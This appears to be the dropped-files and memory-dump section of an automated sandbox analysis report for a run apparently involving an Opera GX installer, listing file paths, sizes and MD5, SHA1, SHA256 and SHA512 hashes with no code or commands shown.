db438ea7b421cd8655cdafb02e98463e44c88a2d18961931a196b9541806f125528a1d5f8a664a0f46647843acbb89e1aee237cf450191731af598f93e9c12a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
6290f2cc35e26ec2940d38a4d856b499

SHA1
300e19ac2011ec73c0628efc631f5400f151f7a9

SHA256
7b3710a7d0dbc0c68199e0a3ee4cfe970302320c2166b1f917638f726846c0ff

SHA512
46b6e4bc262b2aa2a53ed8e441c7e4b7e85e1a0e54087f64a30f3307ad7db24a13802999d73fa379152d27a380d1791958ca29c25f4aed7e53e7367df81f6d3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
3a3234861cc3f2c73b8bc2c5ad0b1c36

SHA1
da4bd16cd11f1883811ed118ad87754375951357

SHA256
d395a236e9117dda7c9f6d7a6427cd68860b920f91373a7a360d47116f1e1f9b

SHA512
6577b8dbcb10cb7bdd8cc2db482e482bc76950f9279eb7e532e96f66cc3cff72a7be7018c15ae8ada73f1a824a880b29bf41236ebaf76bf0da851827bf6af77b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7948321b38a5a970642ef2cbe3664808

SHA1
29293e8436863f640dddcd38b6df19ab9e374ae4

SHA256
7c8aad1c35d3e19a0279b17bd3c8bcbfb9b631b7d962c87812cdd062482ecc6e

SHA512
fb892d2fee016f32aaaad8a02b2faaee5b382b916c8e5ab5c50f1ed58f94c25552fed8ca6592cff557544fd5ba13b0ac50f35a76fc81b39224a531abc04d81d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9792627a11b844360bc3b745a86a279e

SHA1
fb4892405965005a0d47bb738ece4f99f6ee7d7b

SHA256
d7c8101cc89fa852cacbd77b2fe3e9b750a030b5318661c7d1d95dc53aaf1ac7

SHA512
24e96824a4d154b6a785bb5d03b8911b26d01ed0d4ae14b626501f2f0b1d0be3b9c888bdc02d936a9f8dcbd07349d82705d850c4f97d54e4d0a5631ab06d6834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2a1ed47fb85fb2c82afe837e478a8e45

SHA1
ef05e28d53967ffd4ed4f410288c6c41a4b5da39

SHA256
45835620516c90b63e6865987ad4a43f38ac62cdbe33b919d74189688cdeb8d5

SHA512
18057e7476409bf5406d2fa1cdd7c82fc75876adbdb09885fa5a02abb54de44d6161473bc0e292668df626e3b74afa05ad298157c300e7602d0eb6075a3232a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f2e64f727b99284e0e99d19e67abccfa

SHA1
e9521688b7d55ec13f5cce883d415fd8f3bd48f2

SHA256
dcb99136917b6a8b906fc240c3d98b4b0c355320e6bc7341c77e61897e744676

SHA512
54f584a844ba8f76d0b8c4d4088ec2a283ef59c82d78cac8ce3f9c35561a94f2415b443247bcae32157bb53f41ad636f2409ff999190affd0443504d5f9cff06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9e9cde84e97360fb39f64e3697c25587

SHA1
02f67f54c54a08320a5331e464dc77b2816fbc97

SHA256
1bdc4f0e8c0845ba527337f1e791da5873c34dff15eb33c71a5aba89e4db4c80

SHA512
c719f5adf610599f0e57df5241da9b3fb595839fcbf955acbf4007ebc75d400916cec75cf9f24f72be6118237641c7800ae9b4c28b585b71a63d02a5789ca044

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
53fbb36e3de882ade26ea8b023b9a6ce

SHA1
ff48acf3b1475f0933c950856f58aebb26ca4af9

SHA256
c1ed4103218a9267eb4c0266f7a5d599950aa178523cc33357e49b727bb65130

SHA512
a2536a0500b3075e9f87ea66fee73061d6660af246637d04cfb7d80d51ddaa35692682a08663c21db9533cecc0e140a6b610d8656cc1aa02d3969b5d2a83f2c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202404280621141\additional_file0.tmp

Filesize
1.4MB

MD5
e9a2209b61f4be34f25069a6e54affea

SHA1
6368b0a81608c701b06b97aeff194ce88fd0e3c0

SHA256
e950f17f4181009eeafa9f5306e8a9dfd26d88ca63b1838f44ff0efc738e7d1f

SHA512
59e46277ca79a43ed8b0a25b24eff013e251a75f90587e013b9c12851e5dd7283b6172f7d48583982f6a32069457778ee440025c1c754bf7bb6ce8ae1d2c3fc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202404280621141\assistant\assistant_installer.exe

Filesize
1.8MB

MD5
4c8fbed0044da34ad25f781c3d117a66

SHA1
8dd93340e3d09de993c3bc12db82680a8e69d653

SHA256
afe569ce9e4f71c23ba5f6e8fd32be62ac9538e397cde8f2ecbe46faa721242a

SHA512
a04e6fd052d2d63a0737c83702c66a9af834f9df8423666508c42b3e1d8384300239c9ddacdc31c1e85140eb1193bcfac209f218750b40342492ffce6e9da481

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202404280621141\opera_package

Filesize
136.1MB

MD5
6657e5a4abb7716d45335190ad105697

SHA1
eb91bc6cac6baa5c9c0828a7240bde2e6cd39dc1

SHA256
ccdd3f26f1f3c6867a3025699536588959d3655a1a02bcf38c0513e54c2975d2

SHA512
710de1bef7dd97f7d8e08f189be4167ac703916eeac5600eb91f5b43ce2aebe451819a42b22e6cedd473b8eceb13518ed650f4a0319579eba4e4cf8c0e26dfad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404280621142534880.dll

Filesize
5.2MB

MD5
d9381da82bb61f1c9a062efc9cd97ad1

SHA1
5735dd07793e53d0a03e71460f28758e4d723044

SHA256
9d3843246ca4774fcefe7c55fa90018c661a0e54c6f92f9d24aebfa07124b519

SHA512
bba0b159e90ea1eec4e2f1798500e6ca482a0b583142b11da530fb86a3fdee2fd9a17b7ba020d3ab2a49cc0a603e29533b811246c345c996ae753b16671dfd91

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ox32qpl1.yks.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotHhruqi.bat

Filesize
193B

MD5
d73df1d5fc0766515d73bcfcee58aa5d

SHA1
a5e1c1df685e40c150ea7f16a581e4618b19aa44

SHA256
6501e061af4d6a8830843b75678ed69a59f295b7d798744dd8d7270a0b896066

SHA512
b11ef53672b167992d3aac96f1b659962ca019e1434f4cbcefe7b6051ed4025663d1f0984f00b0ff083e1b7c288c73fd2f0446ff638bbdc8a95d6ee9986e2154

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdothqLuW.bat

Filesize
13B

MD5
337065424ed27284c55b80741f912713

SHA1
0e99e1b388ae66a51a8ffeee3448c3509a694db8

SHA256
4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b

SHA512
d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\opera_installer_ui.lck

Filesize
4B

MD5
96503f828c930569aef072f3ed891df8

SHA1
96207c06e310bb11131f14d6856d9d56d3c1a4a0

SHA256
74d7040d6e3f7ef72c0c4001c53f9d5331441534f10f187181d8219b67a05dd1

SHA512
45bccfb24630f74c7e63fcfac2058e55943cf8c5815ec9a2c3abd24bc80e919b2a0f1688d4a8d55c4fb4f80fadb43cd812d93d0eed7770a1ff251a097a99eb67

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports\settings.dat

Filesize
40B

MD5
7facf208c64e785f3d9ecae8a629cb17

SHA1
859492d818fc4459b79e0624fb3a0b42230e28bb

SHA256
ef402dfc62199e25d007fbc8ac48a92f84b9f303ab222eaef44c510c46054f5c

SHA512
c3aa598e7265884af8f908c26df5cc1bfca964a14b2b66629e3855716557493ccf9ca2809aefa35fcccd1cd4c9d461c55f7697b231c7e2142a2d309328c44b28

Download Submit
C:\Users\Admin\Downloads\AddReset.vsx

Filesize
368KB

MD5
ebecc8b106d203c2efbd06bae28911b3

SHA1
60c5a4a894c8a2591ee5ea41e6f2b578673826bd

SHA256
57d83748615e7a7a7852fd67e8922393f032dd75bcac196899e8f884136e412b

SHA512
0e978f8da09decc14c0371da39081d1abb72fb26fa9f0da058b1c466885bd12ed90dbbd5449dc7fc83fb668baa279bfa66edd7fece896e827f6fc8189656a372

Download Submit
C:\Users\Admin\Downloads\EnableUnlock.odt

Filesize
247KB

MD5
7d8a13fef4b3c177b0a85f9e9fd8015c

SHA1
e4f6d92acabdb54bc716b15ac3b1a3d2006b1831

SHA256
40cd0b8f6223f6a272a091e20d436963023279ea975ff29a8e203a5b912db77a

SHA512
80165107ed1e6bcd168536fba1ddcc77e73a92af04784039a5da3cc5a047d9deb6191be52248c15a13a96155881e607cebd25bcb55f131941ab3f79650614341

Download Submit
C:\Users\Admin\Downloads\OperaGXSetup.exe

Filesize
5.7MB

MD5
286625f1bb4cc10049b5d26758cd3724

SHA1
2b95634d7611c88ffb059d3f8dddb5b91aaa742b

SHA256
aa834f2a121b90b8760e49044298abb42e62dab1aea2be6969bec09edf3980d5

SHA512
5bc6c0323f4dcf216663094f691017d7b89edf126005278ab6cfe6852e4cefd12bfdef936314f31cefffc9c1aaeab2011ba73e751450ebd35c8337dadeea0d66

Download Submit
C:\Users\Admin\Downloads\OperaGXSetup.exe:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\RegisterWait.reg

Filesize
479KB

MD5
2961e7cb39f6ead791a79147a0514f27

SHA1
49299a889e57506fdc271a5397b78b94596e3e36

SHA256
61190ee4a7cad034a457eb19753d2986deb754892f209446dd7a617235381d5e

SHA512
a787a7f63ab433ca163f7ccc84ac2e883922f47951e270a5f282820f4b137d06f4a551a55688e8587e9e6bf0ead1038376dabded048bbf0a72206000c1804d78

Download Submit
C:\Users\Admin\Downloads\RemoveSync.rtf

Filesize
449KB

MD5
695b57b8898c55fc36725f342cd2ce82

SHA1
1d1786b0bd9fb56885223482bec3a23dc4f808ff

SHA256
d0c55dbf971167908ab821cb4dde180d8f503debd52dad514dffb3859784ef58

SHA512
2698107f7e95c1f565b2be9dc8c246e166f13cbac897d5bece6b6286cda96cd10ca9820bf330629c3e82ea91221aa28db9419a1f1c4e8014b0c7bbe5bb849702

Download Submit
C:\Users\Admin\Downloads\RestoreDebug.vsd

Filesize
419KB

MD5
d96e548010fc5654f63a5bf99bcf39b3

SHA1
8d043431ade368e09a579ee2f1bacdd546903bf4

SHA256
7ed6eb125e3597c4e15acaa5669af3a26dae73c809f43af64c54e3c0f6cc09d7

SHA512
0e7e19f425ee00e059bef4c05aa83c1c5a47b5ef1b9064ef1271feecbee457ff6d6115b905b955176a1b6ea161e4a60800fdc8e3cc7a0e7f4c5d517b932c9e6c

Download Submit
C:\Users\Admin\Downloads\ShowRestore.mid

Filesize
196KB

MD5
64b8f0b3a0653061573c023862c4de67

SHA1
03c3c1de129ccc313e8cf6015478934ba2ac9909

SHA256
7ff1d07657ef87926cb8f3a0585b527ebebebdfe1d5bf1eb6755ab0eb0109e4f

SHA512
92785b4b3fe8a2dec149341a0b23bf028503749de7344603febb0b0c5fbae433dbb143aa5a48e6c3fb72a22fc085406f644652b5111e0b0bb5bf5e9d4fc809db

Download Submit
C:\Users\Admin\Downloads\SwitchGroup.ocx

Filesize
328KB

MD5
7ca23c2341f79f4d21759fc0fec1bcac

SHA1
70a3c8e178ebd162f4d482157a73424730dc9f8d

SHA256
c243c623360d23501c3952354d437a63177a92f9359eae29c8fbb34217238cba

SHA512
c7f4f6e7e610c79cffb96eb4b28a33e510af9849743a7f3d102b1c5146a5339c6afcbc2a306bce99b4fa3412fa866fd4feb5a133fb7a2d0f0ea282514404c31b

Download Submit
\??\pipe\LOCAL\crashpad_4632_RVFCBLIWMJHCTAZE

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4036-35-0x00007FFE88010000-0x00007FFE88AD2000-memory.dmp

Filesize
10.8MB

Download
memory/4036-31-0x00007FFE88010000-0x00007FFE88AD2000-memory.dmp

Filesize
10.8MB

Download
memory/4036-32-0x000001D2995D0000-0x000001D2995E0000-memory.dmp

Filesize
64KB

Download
memory/4036-30-0x000001D2B3470000-0x000001D2B3492000-memory.dmp

Filesize
136KB

Download
memory/4944-47-0x000001F839D00000-0x000001F839D10000-memory.dmp

Filesize
64KB

Download
memory/4944-46-0x00007FFE88010000-0x00007FFE88AD2000-memory.dmp

Filesize
10.8MB

Download
memory/4944-49-0x00007FFE88010000-0x00007FFE88AD2000-memory.dmp

Filesize
10.8MB

Download